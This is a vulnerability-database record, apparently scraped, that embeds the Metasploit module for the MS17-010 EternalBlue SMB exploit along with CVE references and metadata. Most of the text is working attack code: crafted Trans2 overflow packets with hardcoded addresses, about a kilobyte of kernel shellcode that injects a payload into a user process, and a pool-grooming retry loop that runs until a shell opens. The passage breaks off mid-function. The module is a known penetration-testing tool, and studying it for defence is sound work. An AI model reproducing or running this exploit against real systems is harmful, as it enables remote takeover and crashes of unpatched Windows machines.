kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 
0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet,tree_id,user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + ( \"\\x00\" * 973 )\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = 
EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def make_kernel_shellcode\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n #\"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n 
\"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\\xBF\\x77\\x1F\\xDD\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" +\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" +\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" +\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" +\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" +\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" +\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" +\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" +\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" +\n 
\"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" +\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" +\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" +\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" +\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" +\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" +\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" +\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" +\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" +\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" +\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" +\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" +\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" +\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" +\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" +\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" +\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" +\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" +\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" +\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" +\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" +\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" +\n 
\"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" +\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" +\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" +\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\"#\\x01\\x00\\xC3\"\n\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @rturn [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet,tree_id,user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user hs not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. 
If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "type": "metasploit", "viewCount": 340}, "differentElements": ["published", "modified", "sourceData"], "edition": 2, "lastseen": "2017-07-24T19:27:03"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. 
This may be more likely with some payloads.", "enchantments": {"dependencies": {"modified": "2018-11-24T14:34:23", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", 
"SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "01b8b6ef489d19391021d58437d9bee8", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2018-11-24T14:34:23", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "2018-11-05T23:16:16", "objectVersion": "1.4", "published": "2017-05-30T15:55:28", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q(\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. 
It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n ),\n\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://github.com/RiskSense-Ops/MS17-010']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => ['ETERNALBLUE']\n }\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptBool.new('VERIFY_TARGET', [true, \"Check if remote OS matches exploit Target.\", true]),\n OptBool.new('VERIFY_ARCH', 
[true, \"Check if remote architecture matches exploit Target.\", true]),\n OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])\n ]\n )\n register_advanced_options(\n [\n OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),\n OptInt.new('MaxExploitAttempts', [true, \"The number of times to retry the exploit.\", 3]),\n OptInt.new('GroomAllocations', [true, \"Initial number of times to groom the kernel pool.\", 12]),\n OptInt.new('GroomDelta', [true, \"The amount to increase the groom count by per try.\", 5])\n ]\n )\n\n end\n\n class EternalBlueError < StandardError\n end\n\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? 
and secs < 30\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error(\"SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.\")\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, process_name, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid 
